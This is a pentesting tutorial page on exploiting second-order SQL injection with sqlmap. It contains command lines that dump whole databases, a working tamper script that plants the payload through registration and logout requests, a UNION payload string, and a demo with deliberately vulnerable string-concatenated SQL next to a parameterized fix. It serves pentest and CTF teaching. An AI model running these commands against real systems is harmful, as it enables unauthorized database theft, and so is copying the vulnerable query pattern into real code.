hacktricks/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
2020-07-22 19:36:23 +00:00

Second Order Injection - SQLMap

SQLMap can exploit second-order SQL injections, where the payload is stored by one request and only reaches the vulnerable query when a different page is requested later.
You need to provide:

  • The request where the SQL injection payload is going to be saved
  • The request where sqlmap can find the output of this injection

The request where the SQL injection payload is saved is indicated as in any other injection in sqlmap (for example with -r and -p). The request where sqlmap can read the output of the injection is indicated with --second-url (a URL that sqlmap fetches with a GET after each payload) or with --second-req if you need to indicate a complete raw HTTP request stored in a file (same format as the file given to -r).

Simple second order example:

#Get the output with a GET to a URL
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"

#Get the output sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt
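To see why the payload does nothing in the first request and only fires in the second one, here is a constructed, self-contained illustration. This is an added example, not code from the original page or from sqlmap: sqlite3 stands in for the MySQL backend, and the functions create_account() and details_vulnerable()/details_fixed() are hypothetical stand-ins for the create.php and details.php pages used in the commands above.

```python
import sqlite3

# Constructed demo of a second-order SQL injection (added example, not from the
# page or from sqlmap). sqlite3 stands in for the MySQL backend; create_account()
# and details_*() are hypothetical stand-ins for create.php and details.php.

def setup_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, password TEXT);
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, owner TEXT, flag TEXT);
        INSERT INTO secrets (owner, flag) VALUES ('admin', 'FLAG{constructed-sample}');
    """)
    return db

def create_account(db, username, email, password):
    # First request (the one sqlmap injects into with -r/-p): parameterized, so
    # the payload is stored verbatim and nothing fires here. This is why a
    # normal first-order scan of this request reports nothing.
    db.execute("INSERT INTO users (username, email, password) VALUES (?, ?, ?)",
               (username, email, password))
    db.commit()

def details_vulnerable(db, username):
    # Second request (--second-url / --second-req): the stored email is read back
    # and concatenated into a new query. The quote in the payload closes the
    # string literal and the UNION appends attacker-chosen rows, which is why
    # --technique=U together with a prefix ending in a quote fits this scenario.
    (email,) = db.execute("SELECT email FROM users WHERE username = ?",
                          (username,)).fetchone()
    query = "SELECT id, email FROM users WHERE email = '" + email + "'"
    return db.execute(query).fetchall()

def details_fixed(db, username):
    # Same lookup with the stored value bound as a parameter: the payload is
    # just data and the query returns the account's own row.
    (email,) = db.execute("SELECT email FROM users WHERE username = ?",
                          (username,)).fetchone()
    return db.execute("SELECT id, email FROM users WHERE email = ?",
                      (email,)).fetchall()

def run_demo(payload):
    # Register with the payload in the email field, then query both versions of
    # the details page. Returns (vulnerable_rows, fixed_rows).
    db = setup_db()
    create_account(db, "attacker", payload, "11111111")
    return details_vulnerable(db, "attacker"), details_fixed(db, "attacker")

if __name__ == "__main__":
    vuln, fixed = run_demo("x' UNION SELECT id, flag FROM secrets-- -")
    print("vulnerable details page:", vuln)
    print("fixed details page:     ", fixed)
```

The vulnerable details page leaks the row from the secrets table even though the registration request itself was parameterized; the fixed page returns only the attacker's own row. Note that the stored value, not the request parameter, is what reaches the sink, so in the real target the email must survive any length or format checks of the registration form for the second-order query to ever see it.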

In several cases this won't be enough, because you will need to perform other actions apart from sending the payload and reading a different page (for example, the payload has to be stored by a registration request and the session has to be reset before the page that triggers it can be read).

When this is needed you can use a sqlmap tamper script. For example, the following script registers an account with the payload in the email field and then logs out, reusing a fixed session cookie, before sqlmap sends the request given with -r:

#!/usr/bin/env python

# requests is not bundled with sqlmap: install it in the interpreter that runs sqlmap
import requests
from lib.core.enums import PRIORITY

# Tamper scripts are loaded with --tamper and must expose __priority__,
# dependencies() and tamper(). This one does not modify the payload; it only
# performs the extra HTTP requests the second-order flow needs before each attempt.
__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def login_account(payload):
    # Route through Burp so every request made by the tamper can be inspected
    proxies = {'http': 'http://127.0.0.1:8080'}
    # Cookie of an already established session; replace with your own value
    cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}

    # 1. Register an account whose email field carries the SQLi payload
    params = {"username": "asdasdasd", "email": payload, "password": "11111111"}
    url = "http://10.10.10.10/create.php"
    requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

    # 2. Log out so the login request sqlmap sends next (the one given with -r) starts clean
    url = "http://10.10.10.10/exit.php"
    requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

def tamper(payload, **kwargs):
    # Called by sqlmap before every request that carries a payload; the payload
    # is returned unchanged because the work happens in the side requests
    login_account(payload)
    return payload

A SQLMap tamper is executed before every request that carries an injection payload, and it has to return a payload. In this case we don't care about modifying the payload but about sending some extra requests first, so the payload is returned unchanged.

So, if for some reason we need a more complex flow to exploit the second-order SQL injection, like:

  • Create an account with the SQLi payload inside the "email" field (done by the tamper)
  • Logout (done by the tamper)
  • Login with that account (the request in login.txt, injected via -p email)
  • Send a request to execute the SQL injection and read its output (the request in second.txt)

this sqlmap line will help:

sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
###########
# --tamper tamper.py : Indicates the tamper script to execute before trying each SQLi payload
# -r login.txt : Indicates the request in which to send the SQLi payload
# -p email : Focus on the email parameter (alternatively, mark the injection point with an asterisk, email=*, inside login.txt)
# --second-req second.txt : Request to send afterwards to execute the SQLi and read its output
# --proxy http://127.0.0.1:8080 : Send sqlmap's own requests through this proxy (the tamper sets its own proxy separately)
# --technique=U : Help sqlmap by restricting it to UNION-based payloads
# --dbms mysql : Help sqlmap by indicating the backend DBMS, skipping fingerprinting
# --prefix "a2344r3F'" : Help sqlmap detect the injection by prepending this string (the quote closes the string literal in the vulnerable query)
# --union-char "DTEC" : Use this string instead of NULL when brute-forcing the number of UNION columns, in case NULL breaks the query or is filtered
# -a : Retrieve everything (dump all)